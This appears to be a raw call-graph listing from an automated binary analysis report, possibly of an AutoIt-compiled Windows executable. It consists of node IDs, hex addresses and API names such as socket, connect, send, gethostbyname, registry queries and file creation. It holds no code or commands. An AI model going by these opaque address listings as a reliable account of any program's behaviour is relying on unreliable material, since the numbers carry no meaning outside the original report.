CoUninitialize 103984->103985 103986 deb7b4 103984->103986 103985->103986 103987 deb7d5 103986->103987 103988 d9ca8e 48 API calls 103986->103988 103989 deb81b 103987->103989 103991 d984a6 81 API calls 103987->103991 103988->103987 103990 d984a6 81 API calls 103989->103990 103992 deb827 103990->103992 103993 deb7ef 103991->103993 103997 deb9d3 SetErrorMode CoGetInstanceFromFile 103992->103997 103998 deb861 103992->103998 105442 dca857 CLSIDFromProgID ProgIDFromCLSID lstrcmpiW CoTaskMemFree CLSIDFromString 103993->105442 103995 deb802 103995->103989 103996 deb807 103995->103996 105443 dec235 413 API calls Mailbox 103996->105443 104001 deba1f CoGetObject 103997->104001 104004 deba19 SetErrorMode 103997->104004 104000 deb8a8 GetRunningObjectTable 103998->104000 104012 deb89a 103998->104012 104015 d9cdb4 48 API calls 103998->104015 104011 deb8b8 104000->104011 104014 deb8cb 104000->104014 104001->104004 104005 debaa8 104001->104005 104002 deb814 Mailbox 104007 debad0 VariantClear 104002->104007 104020 deb9b1 104004->104020 105448 dec235 413 API calls Mailbox 104005->105448 104007->103817 104009 debac2 SetErrorMode 104009->104002 104010 deba53 104013 deba6f 104010->104013 105446 dcac4b 51 API calls Mailbox 104010->105446 104011->104014 104021 deb8ed 104011->104021 104012->104000 105447 dda6f6 103 API calls 104013->105447 105444 dec235 413 API calls Mailbox 104014->105444 104018 deb88a 104015->104018 104018->104012 104019 d9cdb4 48 API calls 104018->104019 104019->104012 104020->104005 104020->104010 104021->104020 105445 dcac4b 51 API calls Mailbox 104021->105445 104024 d984a6 81 API calls 104023->104024 104025 df17c7 104024->104025 104026 dd6f5b 63 API calls 104025->104026 104027 df17d8 104026->104027 104027->103817 104029 d984a6 81 API calls 104028->104029 104030 df10fb LoadLibraryW 104029->104030 104031 df111e 104030->104031 104032 df110f 104030->104032 104031->104032 105449 df28d9 48 API calls _memmove 104031->105449 104032->103817 104035 d9ca8e 48 API calls 104034->104035 104036 daef25 104035->104036 104037 daeffb 104036->104037 104038 daef3e 104036->104038 104039 db010a 48 API calls 104037->104039 105479 daf0f3 48 API calls 104038->105479 104041 daf002 104039->104041 104042 daf00e 104041->104042 105481 d95080 49 API calls 104041->105481 104044 d984a6 81 API calls 104042->104044 104049 daf01c 104044->104049 104045 daef73 104050 daf03e 2 API calls 104045->104050 104046 daef4d 104046->104045 104047 e06942 104046->104047 104048 d9cdb4 48 API calls 104046->104048 104047->103817 104051 e06965 104048->104051 104052 d94bf9 56 API calls 104049->104052 104053 daef7a 104050->104053 104051->104045 104054 e0696d 104051->104054 104055 daf02b 104052->104055 104056 e06980 104053->104056 104057 daef87 104053->104057 104058 d9cdb4 48 API calls 104054->104058 104055->104046 104059 e06936 104055->104059 104060 db010a 48 API calls 104056->104060 104061 d9d3d2 48 API calls 104057->104061 104058->104053 104059->104047 105482 d94592 CloseHandle 104059->105482 104062 e06986 104060->104062 104063 daef8f 104061->104063 104064 e0699f 104062->104064 105483 d93d65 ReadFile SetFilePointerEx 104062->105483 105450 daf04e 104063->105450 104071 e069a3 _memmove 104064->104071 105484 ddad14 48 API calls _memset 104064->105484 104067 daef9e 104067->104071 105473 d97bef 104067->105473 104072 daefb2 Mailbox 104073 daeff2 104072->104073 104074 d950ec CloseHandle 104072->104074 104073->103817 104075 daefe4 104074->104075 105480 d94592 CloseHandle 104075->105480 105527 def79f 104077->105527 104079 df0c0a 104079->103817 104081 daf47f 104080->104081 104082 daf48a 104080->104082 104083 d9cdb4 48 API calls 104081->104083 104085 d984a6 81 API calls 104082->104085 104108 daf498 Mailbox 104082->104108 104083->104082 104084 db010a 48 API calls 104086 daf49f 104084->104086 104088 e06841 104085->104088 104087 daf4af 104086->104087 105614 d95080 49 API calls 104086->105614 104091 d984a6 81 API calls 104087->104091 104090 db297d __wsplitpath 47 API calls 104088->104090 104092 e06859 104090->104092 104093 daf4bf 104091->104093 104094 d9caee 48 API calls 104092->104094 104095 d94bf9 56 API calls 104093->104095 104096 e0686a 104094->104096 104097 daf4ce 104095->104097 105621 d939e8 48 API calls 2 library calls 104096->105621 104099 e068d4 GetLastError 104097->104099 104109 daf4d6 104097->104109 104101 e068ed 104099->104101 104100 e06878 104102 e06895 104100->104102 105622 dd6f4b GetFileAttributesW FindFirstFileW FindClose 104100->105622 104101->104109 105623 d94592 CloseHandle 104101->105623 104103 d9cdb4 48 API calls 104102->104103 104103->104108 104104 e06920 104111 db010a 48 API calls 104104->104111 104105 daf4f0 104110 db010a 48 API calls 104105->104110 104107 e06888 104107->104102 104115 dd6d6d 52 API calls 104107->104115 104108->104084 104117 daf50a Mailbox 104108->104117 104109->104104 104109->104105 104113 daf4f5 104110->104113 104114 e06925 104111->104114 105615 d9197e 104113->105615 104115->104102 104117->103817 104119 db010a 48 API calls 104118->104119 104120 d950b3 104119->104120 104121 d950ec CloseHandle 104120->104121 104122 d950be 104121->104122 104122->103817 104124 daf0b5 2 API calls 104123->104124 104125 daf046 104124->104125 104125->103817 104127 d984a6 81 API calls 104126->104127 104128 de913f 104127->104128 104129 d9cdb4 48 API calls 104128->104129 104130 de9149 104129->104130 105624 deacd3 104130->105624 104132 de9156 104133 de915a socket 104132->104133 104137 de9182 104132->104137 104134 de916d WSAGetLastError 104133->104134 104135 de9184 connect 104133->104135 104134->104137 104136 de91a3 WSAGetLastError 104135->104136 104135->104137 105630 ddd7e4 104136->105630 104137->103817 104139 de91b8 closesocket 104139->104137 105645 de6b19 104140->105645 104143 de80a5 104144 d93320 48 API calls 104143->104144 104145 de80b3 104144->104145 105650 da2320 104145->105650 104146 de8102 104148 d9cdb4 48 API calls 104146->104148 104153 de80f5 104146->104153 104150 de812b 104148->104150 104149 de80cf 104151 da2320 50 API calls 104149->104151 104152 d9cdb4 48 API calls 104150->104152 104150->104153 104151->104153 104152->104153 104153->103817 105660 d919ee 104154->105660 104159 df8091 104160 d9d3d2 48 API calls 104159->104160 104161 df809a 104160->104161 105686 dce2e8 104161->105686 104162 df806f 104163 d9ca8e 48 API calls 104162->104163 104167 df808f Mailbox 104163->104167 104165 df80aa 104166 d97bef 48 API calls 104165->104166 104166->104167 104167->103817 105803 df23c5 104168->105803 104172 d9a6d4 48 API calls 104171->104172 104173 de92d2 104172->104173 104174 d984a6 81 API calls 104173->104174 104175 de92e1 104174->104175 104176 daf26b 50 API calls 104175->104176 104177 de92ed gethostbyname 104176->104177 104178 de931d _memmove 104177->104178 104179 de92fa WSAGetLastError 104177->104179 104181 de932d inet_ntoa 104178->104181 104180 de930e 104179->104180 104182 d9ca8e 48 API calls 104180->104182 105887 deadca 48 API calls 2 library calls 104181->105887 104187 de931b Mailbox 104182->104187 104184 de9342 105888 deae5a 50 API calls 104184->105888 104186 de934e 104188 d97bef 48 API calls 104186->104188 104187->103817 104188->104187 105889 dadd92 GetFileAttributesW 104189->105889 104193 d984a6 81 API calls 104192->104193 104194 d981e5 104193->104194 104195 d984a6 81 API calls 104194->104195 104196 d981fa 104195->104196 104197 d984a6 81 API calls 104196->104197 104198 d9820d 104197->104198 104199 d984a6 81 API calls 104198->104199 104200 d98223 104199->104200 104201 d97b6e 48 API calls 104200->104201 104202 d98237 104201->104202 104203 d9846a 104202->104203 104204 d9cdb4 48 API calls 104202->104204 104207 e0d91e 104203->104207 104208 e0d95f 104203->104208 104205 d9825e 104204->104205 104205->104203 104206 e0d752 104205->104206 104234 d98281 __wopenfile 104205->104234 104209 d93320 48 API calls 104206->104209 104211 d93320 48 API calls 104207->104211 104210 d93320 48 API calls 104208->104210 104212 e0d769 104209->104212 104213 e0d96a 104210->104213 104214 e0d928 104211->104214 104218 da2320 50 API calls 104212->104218 104238 e0d790 104212->104238 104215 da2320 50 API calls 104213->104215 104216 d984a6 81 API calls 104214->104216 104220 e0d985 104215->104220 104217 e0d93a 104216->104217 104221 d980ea 48 API calls 104217->104221 104218->104238 104219 d984a6 81 API calls 104222 d98306 104219->104222 104228 d984a6 81 API calls 104220->104228 104224 e0d94e 104221->104224 104225 d984a6 81 API calls 104222->104225 104223 d980ea 48 API calls 104223->104238 104226 d98182 48 API calls 104224->104226 104227 d9831b 104225->104227 104231 e0d95c 104226->104231 104227->104203 104229 e0d7ed 104227->104229 104235 d98342 104227->104235 104232 e0d9a0 104228->104232 104229->104203 104237 d93320 48 API calls 104229->104237 104230 d98182 48 API calls 104230->104238 104239 da2320 50 API calls 104231->104239 104236 d980ea 48 API calls 104232->104236 104233 da2320 50 API calls 104233->104238 104234->104203 104234->104219 104234->104229 104254 d98364 104234->104254 104240 d93320 48 API calls 104235->104240 104241 e0d9b4 104236->104241 104243 e0d84a 104237->104243 104238->104223 104238->104230 104238->104233 104244 d9843f Mailbox 104238->104244 104239->104244 104245 d9834c 104240->104245 104242 d98182 48 API calls 104241->104242 104242->104231 104246 da2320 50 API calls 104243->104246 104244->103817 104248 d9c4cd 48 API calls 104245->104248 104246->104254 104248->104254 104250 da2320 50 API calls 104250->104254 104251 e0d895 104252 e0d8ce 104251->104252 104255 e0d8bf 104251->104255 104253 d98182 48 API calls 104252->104253 104256 e0d8dc 104253->104256 104254->104244 104254->104250 104254->104251 105894 d980ea 104254->105894 105906 d98182 104254->105906 105909 db247b 59 API calls 2 library calls 104254->105909 105910 d9bd2f 48 API calls _memmove 104255->105910 104258 da2320 50 API calls 104256->104258 104259 e0d8ee 104258->104259 104261 d9c4cd 48 API calls 104259->104261 104261->104203 104263 d919ee 83 API calls 104262->104263 104264 df799b 104263->104264 104265 d91dce 107 API calls 104264->104265 104266 df79a4 104265->104266 104266->103817 104268 d9ca8e 48 API calls 104267->104268 104269 df30ca 104268->104269 104270 d9d3d2 48 API calls 104269->104270 104271 df30d3 104270->104271 104272 d9d3d2 48 API calls 104271->104272 104273 df30dc 104272->104273 104274 d9d3d2 48 API calls 104273->104274 104275 df30e5 104274->104275 104276 d984a6 81 API calls 104275->104276 104277 df30f4 104276->104277 104278 df3d7b 48 API calls 104277->104278 104279 df3128 104278->104279 104280 df3af7 49 API calls 104279->104280 104281 df3159 104280->104281 104282 df319c RegOpenKeyExW 104281->104282 104283 df3172 RegConnectRegistryW 104281->104283 104291 df315d Mailbox 104281->104291 104285 df31f7 104282->104285 104286 df31c5 104282->104286 104283->104282 104283->104291 104287 d984a6 81 API calls 104285->104287 104289 df31d9 RegCloseKey 104286->104289 104286->104291 104288 df3207 RegQueryValueExW 104287->104288 104290 df323e 104288->104290 104319 df3229 104288->104319 104289->104291 104292 df344c 104290->104292 104293 df3265 104290->104293 104290->104319 104291->103817 104294 db010a 48 API calls 104292->104294 104296 df326e 104293->104296 104297 df33d9 104293->104297 104298 df3464 104294->104298 104295 df34eb RegCloseKey 104295->104291 104299 df34fe RegCloseKey 104295->104299 104301 df338d 104296->104301 104302 df3279 104296->104302 105912 ddad14 48 API calls _memset 104297->105912 104306 d984a6 81 API calls 104298->104306 104299->104291 104305 d984a6 81 API calls 104301->104305 104303 df32de 104302->104303 104304 df327e 104302->104304 104309 db010a 48 API calls 104303->104309 104312 d984a6 81 API calls 104304->104312 104304->104319 104308 df33a1 RegQueryValueExW 104305->104308 104310 df3479 RegQueryValueExW 104306->104310 104307 df33e4 104311 d984a6 81 API calls 104307->104311 104308->104319 104313 df32f7 104309->104313 104310->104319 104320 df3331 104310->104320 104314 df33f6 RegQueryValueExW 104311->104314 104315 df329f RegQueryValueExW 104312->104315 104316 d984a6 81 API calls 104313->104316 104314->104295 104314->104319 104315->104319 104317 df330c RegQueryValueExW 104316->104317 104317->104319 104317->104320 104318 d9ca8e 48 API calls 104318->104319 104319->104295 104320->104318 104322 dae022 104321->104322 104323 dae034 104321->104323 104324 d9d89e 50 API calls 104322->104324 104325 dae03a 104323->104325 104326 dae063 104323->104326 104329 dae02c 104324->104329 104328 db010a 48 API calls 104325->104328 104327 d9d89e 50 API calls 104326->104327 104327->104329 104328->104329 104329->103778 105913 d9a9a0 104330->105913 104332 da36e7 104333 da3778 104332->104333 104334 e0a269 104332->104334 104390 da3aa8 104332->104390 105925 dabc04 86 API calls 104333->105925 105930 ddd520 86 API calls 4 library calls 104334->105930 104339 e0a3e9 105941 ddd520 86 API calls 4 library calls 104339->105941 104340 da3793 104340->104390 104392 da396b Mailbox _memmove 104340->104392 104394 e0a68d 104340->104394 105918 d910e8 104340->105918 104344 e0a289 104344->104339 105931 d9d2d2 104344->105931 104345 e0a583 104347 d9fa40 413 API calls 104345->104347 104346 e0a45c 105945 ddd520 86 API calls 4 library calls 104346->105945 104350 e0a5b5 104347->104350 104358 d9d380 55 API calls 104350->104358 104350->104390 104353 e0a303 104368 e0a317 104353->104368 104376 e0a341 104353->104376 104354 e0a40f 105942 dacf79 49 API calls 104354->105942 104356 da384e 104361 e0a60c 104356->104361 104362 da38e5 104356->104362 104356->104392 104364 e0a5e6 104358->104364 105950 ddd231 50 API calls 104361->105950 104363 db010a 48 API calls 104362->104363 104379 da38ec 104363->104379 105949 ddd520 86 API calls 4 library calls 104364->105949 104365 d9fa40 413 API calls 104365->104392 104367 e0a42c 104370 e0a441 104367->104370 104371 e0a44d 104367->104371 105937 ddd520 86 API calls 4 library calls 104368->105937 104369 dabc5c 48 API calls 104369->104392 105943 ddd520 86 API calls 4 library calls 104370->105943 105944 ddd520 86 API calls 4 library calls 104371->105944 104377 e0a366 104376->104377 104382 e0a384 104376->104382 105938 def211 413 API calls 104377->105938 104378 d9d89e 50 API calls 104378->104392 104384 d9e1f0 413 API calls 104379->104384 104387 da399f 104379->104387 104381 e0a37a 104381->104390 105940 dabaef 48 API calls _memmove 104381->105940 104382->104381 105939 def4df 413 API calls 104382->105939 104384->104392 104385 db010a 48 API calls 104385->104392 104388 d9c935 48 API calls 104387->104388 104389 da39c0 104387->104389 104388->104389 104389->104390 104393 e0a65e 104389->104393 104396 da3a05 104389->104396 104399 da3ab5 Mailbox 104390->104399 105929 ddd520 86 API calls 4 library calls 104390->105929 104392->104344 104392->104345 104392->104346 104392->104364 104392->104365 104392->104369 104392->104378 104392->104385 104392->104387 104392->104390 105926 d9d500 53 API calls __cinit 104392->105926 105927 d9d420 53 API calls 104392->105927 105928 dabaef 48 API calls _memmove 104392->105928 105946 ded21a 82 API calls Mailbox 104392->105946 105947 dd89e0 53 API calls 104392->105947 105948 d9d772 55 API calls 104392->105948 104395 d9d89e 50 API calls 104393->104395 104394->104390 105951 ddd520 86 API calls 4 library calls 104394->105951 104395->104394 104396->104390 104396->104394 104397 da3a95 104396->104397 104398 d9d89e 50 API calls 104397->104398 104398->104390 104399->103817 104400->103817 104402 d9d8ac 104401->104402 104409 d9d8db Mailbox 104401->104409 104403 d9d8ff 104402->104403 104405 d9d8b2 Mailbox 104402->104405 104404 d9c935 48 API calls 104403->104404 104404->104409 104406 d9d8c7 104405->104406 104407 e04e9b 104405->104407 104408 e04e72 VariantClear 104406->104408 104406->104409 104407->104409 105955 dca599 InterlockedDecrement 104407->105955 104408->104409 104409->103798 104412 d9cafd __NMSG_WRITE _memmove 104411->104412 104413 db010a 48 API calls 104412->104413 104414 d9cb3b 104413->104414 104414->103822 104415->103817 104416->103817 104417->103817 104418->103817 104419->103784 104420->103787 104422 d9c948 104421->104422 104423 d9c940 104421->104423 104422->103815 104424 d9d805 48 API calls 104423->104424 104424->104422 104425->103822 104426->103815 104427->103785 104428->103796 104429->103791 104430->103795 104431->103807 104533 d9d3d2 104432->104533 104434 def389 Mailbox 104436 def3cd 104434->104436 104437 def3e1 104434->104437 104451 def3a9 104434->104451 104435 d9d89e 50 API calls 104449 def421 Mailbox 104435->104449 104544 d97e53 104436->104544 104439 d9c935 48 API calls 104437->104439 104440 def3df 104439->104440 104441 def429 104440->104441 104553 decdb5 413 API calls 104440->104553 104538 decd12 104441->104538 104444 def410 104444->104441 104446 def414 104444->104446 104445 def44b 104448 def4a2 104445->104448 104452 def457 104445->104452 104554 ddd338 86 API calls 4 library calls 104446->104554 104450 def34f 413 API calls 104448->104450 104449->103912 104450->104449 104451->104435 104452->104451 104453 def476 104452->104453 104555 d9ca8e 104453->104555 104456 da1606 104455->104456 104458 da14b2 104455->104458 104456->103895 104457 da14be 104462 da14c9 104457->104462 104681 d9346e 48 API calls 104457->104681 104458->104457 104460 db010a 48 API calls 104458->104460 104461 e05299 104460->104461 104464 db010a 48 API calls 104461->104464 104463 da156d 104462->104463 104465 db010a 48 API calls 104462->104465 104463->103895 104470 e052a4 104464->104470 104466 da15af 104465->104466 104467 da15c2 104466->104467 104680 dad6b4 48 API calls 104466->104680 104467->103895 104469 db010a 48 API calls 104469->104470 104470->104457 104470->104469 104471->103856 104473 d93444 104472->104473 104474 d93435 104472->104474 104473->103889 104475 db010a 48 API calls 104474->104475 104475->104473 104476->103889 104477->103866 104478->103889 104479->103857 104480->103866 104481->103866 104482->103871 104483->103905 104485 da469f 104484->104485 104486 da4537 104484->104486 104489 d9caee 48 API calls 104485->104489 104487 e07820 104486->104487 104488 da4543 104486->104488 104854 dee713 413 API calls Mailbox 104487->104854 104682 da4040 104488->104682 104496 da45e4 Mailbox 104489->104496 104492 da4639 Mailbox 104492->103912 104493 e0782c 104493->104492 104855 ddd520 86 API calls 4 library calls 104493->104855 104495 da4559 104495->104492 104495->104493 104495->104496 104503 df1f19 132 API calls 104496->104503 104697 de1080 104496->104697 104700 de6fc3 104496->104700 104703 ddefcd 104496->104703 104737 d950ec 104496->104737 104741 df352a 104496->104741 104829 dddce9 104496->104829 104834 de95af WSAStartup 104496->104834 104836 de9500 104496->104836 104845 daf55e 104496->104845 104503->104492 104507->103900 104508->103907 104509->103910 104510->103912 104511->103879 104514 d984be 104512->104514 104530 d984ba 104512->104530 104513 e05592 __i64tow 104514->104513 104515 e05494 104514->104515 104516 d984d2 104514->104516 104524 d984ea __itow Mailbox _wcscpy 104514->104524 104517 e0557a 104515->104517 104518 e0549d 104515->104518 105413 db234b 80 API calls 3 library calls 104516->105413 105414 db234b 80 API calls 3 library calls 104517->105414 104523 e054bc 104518->104523 104518->104524 104521 db010a 48 API calls 104522 d984f4 104521->104522 104526 d9caee 48 API calls 104522->104526 104522->104530 104525 db010a 48 API calls 104523->104525 104524->104521 104528 e054d9 104525->104528 104526->104530 104527 db010a 48 API calls 104529 e054ff 104527->104529 104528->104527 104529->104530 104531 d9caee 48 API calls 104529->104531 104530->103899 104531->104530 104532->103887 104569 db010a 104533->104569 104535 d9d3f3 104536 db010a 48 API calls 104535->104536 104537 d9d401 104536->104537 104537->104434 104539 decd21 104538->104539 104540 decd46 104538->104540 104541 d9ca8e 48 API calls 104539->104541 104540->104445 104542 decd2d 104541->104542 104600 dec8b7 104542->104600 104545 d97ecf 104544->104545 104547 d97e5f __NMSG_WRITE 104544->104547 104668 d9a2fb 104545->104668 104548 d97e7b 104547->104548 104549 d97ec7 104547->104549 104664 d9a6f8 104548->104664 104667 d97eda 48 API calls 104549->104667 104552 d97e85 _memmove 104552->104440 104553->104444 104554->104449 104556 d9ca9a 104555->104556 104557 d9cad0 104555->104557 104563 db010a 48 API calls 104556->104563 104558 d9cad9 104557->104558 104559 d9cae3 104557->104559 104560 d97e53 48 API calls 104558->104560 104676 d9c4cd 104559->104676 104562 d9cac6 104560->104562 104562->104449 104564 d9caad 104563->104564 104565 e04f11 104564->104565 104566 d9cab8 104564->104566 104565->104562 104568 d9d3d2 48 API calls 104565->104568 104566->104562 104567 d9caee 48 API calls 104566->104567 104567->104562 104568->104562 104572 db0112 __calloc_impl 104569->104572 104571 db012c 104571->104535 104572->104571 104573 db012e std::exception::exception 104572->104573 104578 db45ec 104572->104578 104592 db7495 RaiseException 104573->104592 104575 db0158 104593 db73cb 47 API calls _free 104575->104593 104577 db016a 104577->104535 104579 db4667 __calloc_impl 104578->104579 104582 db45f8 __calloc_impl 104578->104582 104599 db889e 47 API calls __getptd_noexit 104579->104599 104583 db462b RtlAllocateHeap 104582->104583 104585 db4603 104582->104585 104587 db4653 104582->104587 104590 db4651 104582->104590 104583->104582 104584 db465f 104583->104584 104584->104572 104585->104582 104594 db8e52 47 API calls __NMSG_WRITE 104585->104594 104595 db8eb2 47 API calls 5 library calls 104585->104595 104596 db1d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104585->104596 104597 db889e 47 API calls __getptd_noexit 104587->104597 104598 db889e 47 API calls __getptd_noexit 104590->104598 104592->104575 104593->104577 104594->104585 104595->104585 104597->104590 104598->104584 104599->104584 104602 dec914 104600->104602 104603 dec8f7 104600->104603 104658 dec235 413 API calls Mailbox 104602->104658 104603->104602 104604 decc61 104603->104604 104607 dec934 104603->104607 104605 decc6e 104604->104605 104606 decca9 104604->104606 104654 dad6b4 48 API calls 104605->104654 104606->104602 104612 deccb6 104606->104612 104607->104602 104636 dcabf3 104607->104636 104609 dec964 104609->104602 104610 dec973 104609->104610 104622 dec9a1 104610->104622 104640 dca8c8 104610->104640 104656 dad6b4 48 API calls 104612->104656 104613 decc87 104655 dd97b6 89 API calls 104613->104655 104617 deccd6 104657 dd503c 91 API calls Mailbox 104617->104657 104623 deca4a 104622->104623 104650 dca25b 106 API calls 104622->104650 104633 decc52 104633->104540 104637 dcac16 104636->104637 104638 dcac04 __NMSG_WRITE 104636->104638 104637->104609 104638->104637 104659 d93bcf 104638->104659 104642 dca8f2 104640->104642 104641 dca90a 104641->104622 104642->104641 104643 dca9ed SysFreeString 104642->104643 104644 dcaa7e 104642->104644 104649 dca9f9 104642->104649 104643->104649 104644->104641 104644->104649 104649->104641 104650->104622 104654->104613 104655->104633 104656->104617 104657->104633 104658->104633 104660 d93bd9 __NMSG_WRITE 104659->104660 104661 db010a 48 API calls 104660->104661 104662 d93bee _wcscpy 104661->104662 104662->104637 104665 db010a 48 API calls 104664->104665 104666 d9a702 104665->104666 104666->104552 104667->104552 104669 d9a321 _memmove 104668->104669 104670 d9a309 104668->104670 104669->104552 104670->104669 104672 d9b8a7 104670->104672 104673 d9b8ba 104672->104673 104675 d9b8b7 _memmove 104672->104675 104674 db010a 48 API calls 104673->104674 104674->104675 104675->104669 104677 d9c4e7 104676->104677 104679 d9c4da 104676->104679 104678 db010a 48 API calls 104677->104678 104678->104679 104679->104562 104680->104467 104681->104462 104683 e0787b 104682->104683 104686 da406c 104682->104686 104857 ddd520 86 API calls 4 library calls 104683->104857 104685 e0788c 104858 ddd520 86 API calls 4 library calls 104685->104858 104686->104685 104692 da40a6 _memmove 104686->104692 104689 db010a 48 API calls 104689->104692 104690 da41f1 104690->104495 104691 d9fa40 413 API calls 104691->104692 104692->104689 104692->104691 104693 e078d8 104692->104693 104694 da4175 104692->104694 104695 da4185 104692->104695 104859 ddd520 86 API calls 4 library calls 104693->104859 104694->104695 104856 ded21a 82 API calls Mailbox 104694->104856 104695->104495 104860 de22e5 104697->104860 104699 de1090 104699->104492 104701 d984a6 81 API calls 104700->104701 104702 de6fd6 SetWindowTextW 104701->104702 104702->104492 104704 d984a6 81 API calls 104703->104704 104705 ddeff2 104704->104705 105053 dd78ad GetFullPathNameW 104705->105053 104710 ddf04b CoInitialize CoCreateInstance 104712 ddf08e 104710->104712 104713 ddf070 104710->104713 104714 d984a6 81 API calls 104712->104714 104715 ddf07a CoUninitialize 104713->104715 104738 d95105 104737->104738 104739 d950f6 104737->104739 104738->104739 104740 d9510a CloseHandle 104738->104740 104739->104492 104740->104739 104742 d9d3d2 48 API calls 104741->104742 104743 df354a 104742->104743 104744 d9d3d2 48 API calls 104743->104744 104745 df3553 104744->104745 104746 d9d3d2 48 API calls 104745->104746 104747 df355c 104746->104747 104748 d984a6 81 API calls 104747->104748 104757 df35e9 Mailbox 104747->104757 104749 df3580 104748->104749 105079 df3d7b 104749->105079 104757->104492 104830 d984a6 81 API calls 104829->104830 104831 dddcfc 104830->104831 105149 dd6d6d 104831->105149 104833 dddd06 104833->104492 104835 de95e0 104834->104835 104835->104492 104837 d9cdb4 48 API calls 104836->104837 104838 de9515 104837->104838 104839 ddbe47 50 API calls 104838->104839 104840 de9522 104839->104840 104841 de952f send 104840->104841 104842 de9546 104841->104842 104843 de9552 WSAGetLastError 104842->104843 104844 de956a 104842->104844 104843->104844 104844->104492 104846 d9cdb4 48 API calls 104845->104846 104847 daf572 104846->104847 104848 daf57a timeGetTime 104847->104848 104849 e075d1 Sleep 104847->104849 104850 d9cdb4 48 API calls 104848->104850 104851 daf590 104850->104851 105161 d9e1f0 104851->105161 104854->104493 104855->104492 104856->104690 104857->104685 104858->104695 104859->104695 104861 de2306 104860->104861 104862 de230a 104861->104862 104863 de2365 104861->104863 104864 db010a 48 API calls 104862->104864 104929 daf0f3 48 API calls 104863->104929 104866 de2311 104864->104866 104867 de231f 104866->104867 104916 d95080 49 API calls 104866->104916 104869 d984a6 81 API calls 104867->104869 104872 de2331 104869->104872 104870 de2379 104871 de234d 104870->104871 104874 de243f 104870->104874 104877 de23bb 104870->104877 104871->104699 104917 d94bf9 104872->104917 104936 ddbe47 104874->104936 104880 d984a6 81 API calls 104877->104880 104878 de2446 104940 dd689f SetFilePointerEx SetFilePointerEx WriteFile 104878->104940 104886 de23c2 104880->104886 104882 de23f6 104898 dd67dc 104882->104898 104883 de2400 104930 d97b6e 104883->104930 104886->104882 104886->104883 104892 de23fe Mailbox 104892->104871 104894 d950ec CloseHandle 104892->104894 104896 de2490 104894->104896 104941 d94592 CloseHandle 104896->104941 104899 dd67ec 104898->104899 104900 dd67f6 104898->104900 104958 dd6917 SetFilePointerEx SetFilePointerEx WriteFile 104899->104958 104902 dd67fc 104900->104902 104903 dd6808 104900->104903 104959 dd68b9 51 API calls 104902->104959 104905 dd6824 104903->104905 104906 dd6811 104903->104906 104942 d9a6d4 104905->104942 104908 d9a6d4 48 API calls 104906->104908 104915 dd67f4 Mailbox 104915->104892 104916->104867 104918 d950ec CloseHandle 104917->104918 104919 d94c04 104918->104919 104998 d94b88 104919->104998 104929->104870 104931 db010a 48 API calls 104930->104931 104932 d97b93 104931->104932 104933 d9a6f8 48 API calls 104932->104933 104934 d97ba2 104933->104934 104937 ddbe55 104936->104937 104938 ddbe50 104936->104938 104937->104878 105052 ddae06 50 API calls 2 library calls 104938->105052 104940->104892 104941->104871 104958->104915 104959->104915 104999 e04957 104998->104999 105000 d94ba1 CreateFileW 104998->105000 105001 e0495d CreateFileW 104999->105001 105003 d94bc3 104999->105003 105000->105003 105001->105003 105052->104937 105054 d97e53 48 API calls 105053->105054 105055 dd78df 105054->105055 105072 dae617 105055->105072 105058 de267a 105059 de26a4 __NMSG_WRITE 105058->105059 105060 ddf039 105059->105060 105061 de26d8 105059->105061 105064 de2763 105059->105064 105060->104710 105065 d939e8 48 API calls 2 library calls 105060->105065 105061->105060 105076 dadfd2 60 API calls 105061->105076 105064->105060 105077 dadfd2 60 API calls 105064->105077 105065->104710 105073 dae625 105072->105073 105074 d9a2fb 48 API calls 105073->105074 105075 dae635 105074->105075 105075->105058 105076->105061 105077->105064 105080 d9c4cd 48 API calls 105079->105080 105081 df3d89 105080->105081 105082 d9c4cd 48 API calls 105081->105082 105083 df3d91 105082->105083 105084 d9c4cd 48 API calls 105083->105084 105150 dd6d8a __NMSG_WRITE 105149->105150 105151 dd6db3 GetFileAttributesW 105150->105151 105152 dd6dc5 GetLastError 105151->105152 105157 dd6de3 105151->105157 105153 dd6de7 105152->105153 105154 dd6dd0 CreateDirectoryW 105152->105154 105155 d93bcf 48 API calls 105153->105155 105153->105157 105154->105153 105154->105157 105156 dd6df7 _wcsrchr 105155->105156 105156->105157 105158 dd6d6d 48 API calls 105156->105158 105157->104833 105159 dd6e1b 105158->105159 105159->105157 105160 dd6e28 CreateDirectoryW 105159->105160 105160->105157 105162 d9e216 105161->105162 105185 d9e226 Mailbox 105161->105185 105163 d9e670 105162->105163 105162->105185 105291 daecee 413 API calls 105163->105291 105164 ddd520 86 API calls 105164->105185 105165 d9e4e7 105167 d9e4fd 105165->105167 105292 d9322e 16 API calls 105165->105292 105167->104492 105169 d9e681 105169->105167 105170 d9e68e 105169->105170 105293 daec33 413 API calls Mailbox 105170->105293 105171 d9e26c PeekMessageW 105171->105185 105173 d9e695 LockWindowUpdate DestroyWindow GetMessageW 105173->105167 105176 d9e6c7 105173->105176 105174 e05b13 Sleep 105174->105185 105180 d9e657 PeekMessageW 105180->105185 105181 d9e517 timeGetTime 105181->105185 105183 db010a 48 API calls 105183->105185 105184 d9c935 48 API calls 105184->105185 105185->105164 105185->105165 105185->105171 105185->105174 105185->105180 105185->105181 105185->105183 105185->105184 105186 d9e641 TranslateMessage DispatchMessageW 105185->105186 105187 e05dfc WaitForSingleObject 105185->105187 105190 e06147 Sleep 105185->105190 105191 e05cce Mailbox 105185->105191 105192 d9e6cc timeGetTime 105185->105192 105193 e05feb Sleep 105185->105193 105200 d91000 389 API calls 105185->105200 105204 e05cea Sleep 105185->105204 105207 d91dce 107 API calls 105185->105207 105210 dacf79 49 API calls 105185->105210 105215 d9fa40 389 API calls 105185->105215 105217 da44e0 389 API calls 105185->105217 105218 da3680 389 API calls 105185->105218 105221 d9caee 48 API calls 105185->105221 105222 d9d380 55 API calls 105185->105222 105223 d9e7e0 105185->105223 105230 d9ea00 105185->105230 105280 daf381 105185->105280 105285 daed1a 105185->105285 105290 d9e7b0 413 API calls Mailbox 105185->105290 105295 df8b20 48 API calls 105185->105295 105303 dae3a5 timeGetTime 105185->105303 105186->105180 105187->105185 105188 e05e19 GetExitCodeProcess CloseHandle 105187->105188 105188->105185 105189 d9d3d2 48 API calls 105189->105191 105190->105191 105191->105185 105191->105189 105198 e061de GetExitCodeProcess 105191->105198 105191->105204 105205 df8a48 108 API calls 105191->105205 105208 e05cd7 Sleep 105191->105208 105209 e06266 Sleep 105191->105209 105213 d9caee 48 API calls 105191->105213 105296 dd56dc 49 API calls Mailbox 105191->105296 105297 dacf79 49 